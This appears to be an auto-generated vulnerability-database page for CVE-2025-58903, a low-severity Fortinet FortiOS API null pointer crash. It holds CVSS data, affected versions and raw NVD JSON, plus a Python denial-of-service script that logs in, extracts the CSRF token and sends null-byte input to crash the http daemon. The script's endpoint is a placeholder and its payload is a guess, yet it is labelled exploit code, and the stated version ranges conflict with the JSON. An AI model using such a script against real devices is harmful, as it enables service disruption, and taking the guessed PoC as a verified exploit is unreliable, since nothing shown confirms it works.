Security Vulnerability Report
中文
CVE-2025-58903 CVSS 2.7 LOW

CVE-2025-58903

Published: 2025-10-14 16:15:41
Last Modified: 2025-10-14 20:22:21
Source: [email protected]

Description

An Unchecked Return Value vulnerability [CWE-252] in Fortinet FortiOS version 7.6.0 through 7.6.3 and before 7.4.8 API allows an authenticated user to cause a Null Pointer Dereference, crashing the http daemon via a specialy crafted request.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
Fortinet FortiOS 7.6.0
Fortinet FortiOS 7.6.1
Fortinet FortiOS 7.6.2
Fortinet FortiOS 7.6.3
Fortinet FortiOS < 7.4.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58903 - FortiOS API Unchecked Return Value DoS PoC # This PoC demonstrates triggering a Null Pointer Dereference # in FortiOS HTTP API to crash the httpd daemon. # Requires valid authentication credentials (PR:H). import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TARGET = "https://<fortios-ip>" USERNAME = "<valid_username>" PASSWORD = "<valid_password>" def exploit(): session = requests.Session() # Step 1: Authenticate to obtain a session token login_url = f"{TARGET}/logincheck" login_data = { "username": USERNAME, "secretkey": PASSWORD } resp = session.post(login_url, data=login_data, verify=False) print(f"[*] Login response status: {resp.status_code}") # Extract CSRF token from cookies or response # FortiOS typically sets a cookie like 'ccsrftoken' with a 'XXXXXX' prefix csrf_token = None for cookie in session.cookies: if 'ccsrftoken' in cookie.name: csrf_token = cookie.value.strip('"') # Remove the leading 'XXXXXX' prefix used by FortiGate if csrf_token.startswith('XXXXXX'): csrf_token = csrf_token[6:] break if not csrf_token: print("[!] Failed to obtain CSRF token") return # Step 2: Send a crafted request to the vulnerable API endpoint # The crafted payload targets the unchecked return value path, # causing a NULL pointer dereference in the httpd daemon api_url = f"{TARGET}/api/v2/..." # Target vulnerable API endpoint headers = { "X-CSRFTOKEN": csrf_token, "Content-Type": "application/json" } # Crafted payload designed to trigger NULL return from internal function payload = { # Malformed/edge-case parameters to trigger unchecked NULL return "key": "\x00" * 1024, # Null bytes or oversized input } try: resp = session.post(api_url, json=payload, headers=headers, verify=False, timeout=10) print(f"[*] API response status: {resp.status_code}") except requests.exceptions.ConnectionError: print("[+] Target httpd daemon may have crashed (connection refused)") except requests.exceptions.Timeout: print("[+] Target httpd daemon may have crashed (timeout)") except Exception as e: print(f"[*] Exception: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58903", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:40.930", "lastModified": "2025-10-14T20:22:21.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Unchecked Return Value vulnerability [CWE-252] in Fortinet FortiOS version 7.6.0 through 7.6.3 and before 7.4.8 API allows an authenticated user to cause a Null Pointer Dereference, crashing the http daemon via a specialy crafted request."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-252"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "1B6548FD-E370-45D7-81D5-6EF892810052"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "C1C30E0D-7F09-42D2-9EB1-E2196BD50D75"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-653", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.